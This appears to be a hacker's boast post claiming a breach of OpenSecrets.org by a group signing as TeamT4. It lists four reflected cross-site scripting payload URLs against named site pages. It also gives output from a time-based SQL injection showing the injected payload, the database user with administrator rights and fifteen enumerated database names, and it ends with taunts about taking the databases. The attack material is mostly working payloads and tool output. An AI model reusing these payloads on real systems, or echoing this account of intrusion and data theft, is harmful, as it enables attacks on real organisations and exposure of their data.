OpenSecrets.org Hacked by JM511, Databases,Xssed

1. 10100010101010010110101101010010010101
2. 01 ( JM511 HACKER ) -------->
3. 10 www.T4em.Com ! TeamT4 -------->
4. 11 www.TwitteR.com/JM511 -------->
5. 00 EmaiL: jm511com@gmaiL.Com -------->
6. 10100010101010010110101101010010010101
7.  
8. Today : 27 Nov:
9. HappyThanksgiving
10.  
11. ------------------------
12. - Cyb3rFUN -
13. ------------------------
14.  
15. Center for Responsive Politics
16. Non-profit · opensecrets.org
17. The Center for Responsive Politics is a non-profit, nonpartisan research group based in Washington, D.C., that tracks the effects of money and lobbying on elections and public policy. It maintains a public online database of its information. Wikipedia
18. Founder: Frank Church
19. Founded: 1983
20.  
21. OpenSecrets.org: Money in Politics -- See Who's Giving ...
22. http://www.opensecrets.org
23.  
24. XSSED:
25. {
26. http://www.opensecrets.org/industries/indus.php?Ind=F//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E%20alert%28String.fromCharCode%2888,%2083,%2083,%2069,%2068,%2032,%2066,%2089,%2032,%2064,%2074,%2077,%2053,%2049,%2049,%2032%29%29%3C/SCRIPT%3E-&__cf_waf_tk__=007869002Kf5ZguYfovOzqiSUpo1FXMUtIwY
27. }
28. {
29. http://www.opensecrets.org/lobby/top.php?indexType=i//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E%20alert%28String.fromCharCode%2888,%2083,%2083,%2069,%2068,%2032,%2066,%2089,%2032,%2064,%2074,%2077,%2053,%2049,%2049,%2032%29%29%3C/SCRIPT%3E-&__cf_waf_tk__=000410002qEfM3gzLl-BxCcsBfTDP9vhbwRo
30. }
31. {
32. http://www.opensecrets.org/bigpicture/cost.php?cycle=2012//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E%20alert%28String.fromCharCode%2888,%2083,%2083,%2069,%2068,%2032,%2066,%2089,%2032,%2064,%2074,%2077,%2053,%2049,%2049,%2032%29%29%3C/SCRIPT%3E-&__cf_waf_tk__=077248002MLkzn04mrb318QOdwHyLrY2zm9A
33. }
34. {
35. http://www.opensecrets.org/lobby/indus.php?id=A//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E%20alert%28String.fromCharCode%2888,%2083,%2083,%2069,%2068,%2032,%2066,%2089,%2032,%2064,%2074,%2077,%2053,%2049,%2049,%2032%29%29%3C/SCRIPT%3E-&__cf_waf_tk__=011406002I-66NIG3k-7k-sId-kF648VLxdc
36. }
37. Parameter: id (GET)
38. Type: stacked queries
39. Title: Microsoft SQL Server/Sybase stacked queries (comment)
40. Payload: id=d000000090';WAITFOR DELAY '0:0:3'--
41. Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
42.  
43.  
44. banner: 'Mi'
45.  
46. current user: 'webgen5'
47.  
48. current database: '0x5700650002005'
49. current user is DBA: True
50. available databases [15]:
51. [*] AdventureWorks
52. [*] AdventureWorksDW
53. [*] APIs
54. [*] BlogOS
55. [*] Comm
56. [*] distribution
57. [*] Expend
58. [*] Indivs
59. [*] master
60. [*] model
61. [*] msdb
62. [*] Orgs
63. [*] tempdb
64. [*] Web
65. [*] wordpress
66.  
67.  
68.  
69. Footprint was put at this point...
70. Only to find out what's your databases for fun...
71. :) Greeting from Saudi Arabian Hackers
72. www.T4EM.Com BlackHat Hackers T4T
73.  
74. https://www.opensecrets.org/news/wp-login.php
75. I colud change your index :) by Wordpress .. BUT NOT BIG DEAL FOR ME RIGHT NOW !! :)
76. I PULLED OUT UR DATABASES THAT WHAT I WANT .. IT'S FOR ME ONLY .. :)
77. Check ur Database here Later > http://database-hacked.t4em.com/